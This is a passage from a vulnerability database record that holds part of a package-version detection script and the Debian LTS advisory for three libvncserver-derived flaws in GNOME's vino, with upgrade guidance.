advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several vulnerabilities have been identified in the VNC code of vino, a\ndesktop sharing utility for the GNOME desktop environment.\n\nThe vulnerabilities referenced below are issues that have originally been\nreported against Debian source package libvncserver. The vino source\npackage in Debian ships a custom-patched and stripped down variant of\nlibvncserver, thus some of libvncserver's security fixes required porting\nover.\n\nCVE-2014-6053\n\nThe rfbProcessClientNormalMessage function in\nlibvncserver/rfbserver.c in LibVNCServer did not properly handle\nattempts to send a large amount of ClientCutText data, which allowed\nremote attackers to cause a denial of service (memory consumption or\ndaemon crash) via a crafted message that was processed by using a\nsingle unchecked malloc.\n\nCVE-2018-7225\n\nAn issue was discovered in LibVNCServer.\nrfbProcessClientNormalMessage() in rfbserver.c did not sanitize\nmsg.cct.length, leading to access to uninitialized and potentially\nsensitive data or possibly unspecified other impact (e.g., an integer\noverflow) via specially crafted VNC packets.\n\nCVE-2019-15681\n\nLibVNC contained a memory leak (CWE-655) in VNC server code, which\nallowed an attacker to read stack memory and could be abused for\ninformation disclosure. Combined with another vulnerability, it could\nbe used to leak stack memory and bypass ASLR. This attack appeared to\nbe exploitable via network connectivity.\");\n\n script_tag(name:\"affected\", value:\"'vino' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n3.14.0-2+deb8u1.\n\nWe recommend that you upgrade your vino packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"vino\", ver:\"3.14.0-2+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-11-29T22:14:35", "bulletinFamily": "unix", "description": "Package : vino\nVersion : 3.14.0-2+deb8u1\nCVE ID : CVE-2014-6053 CVE-2018-7225 CVE-2019-15681\nDebian Bug : 945784\n\n\nSeveral vulnerabilities have been identified in the VNC code of vino, a\ndesktop sharing utility for the GNOME desktop environment.\n\nThe vulnerabilities referenced below are issues that have originally been\nreported against Debian source package libvncserver. The vino source\npackage in Debian ships a custom-patched and stripped down variant of\nlibvncserver, thus some of libvncserver's security fixes required porting\nover.\n\nCVE-2014-6053\n\n The rfbProcessClientNormalMessage function in\n libvncserver/rfbserver.c in LibVNCServer did not properly handle\n attempts to send a large amount of ClientCutText data, which allowed\n remote attackers to cause a denial of service (memory consumption or\n daemon crash) via a crafted message that was processed by using a\n single unchecked malloc.\n\nCVE-2018-7225\n\n An issue was discovered in LibVNCServer.\n rfbProcessClientNormalMessage() in rfbserver.c did not sanitize\n msg.cct.length, leading to access to uninitialized and potentially\n sensitive data or possibly unspecified other impact (e.g., an integer\n overflow) via specially crafted VNC packets.\n\nCVE-2019-15681\n\n LibVNC contained a memory leak (CWE-655) in VNC server code, which\n allowed an attacker to read stack memory and could be abused for\n information disclosure. Combined with another vulnerability, it could\n be used to leak stack memory and bypass ASLR. This attack appeared to\n be exploitable via network connectivity.\n\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n3.14.0-2+deb8u1.\n\nWe recommend that you upgrade your vino packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n-- \n\nmike gabriel aka sunweaver (Debian Developer)\nfon: +49 (1520) 1976 148\n\nGnuPG Fingerprint: 9BFB AEE8 6C0A A5FF BF22 0782 9AF4 6B30 2577 1B31\nmail: sunweaver@debian.org, http://sunweavers.net\n", "modified": "2019-11-29T08:31:28", "published": "2019-11-29T08:31:28", "id": "DEBIAN:DLA-2014-1:AEDFD", "href": "https://lists.debian.org/debian-lts-announce/2019/debian-lts-announce-201911/msg00032.html", "title": "[SECURITY] [DLA 2014-1] vino security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}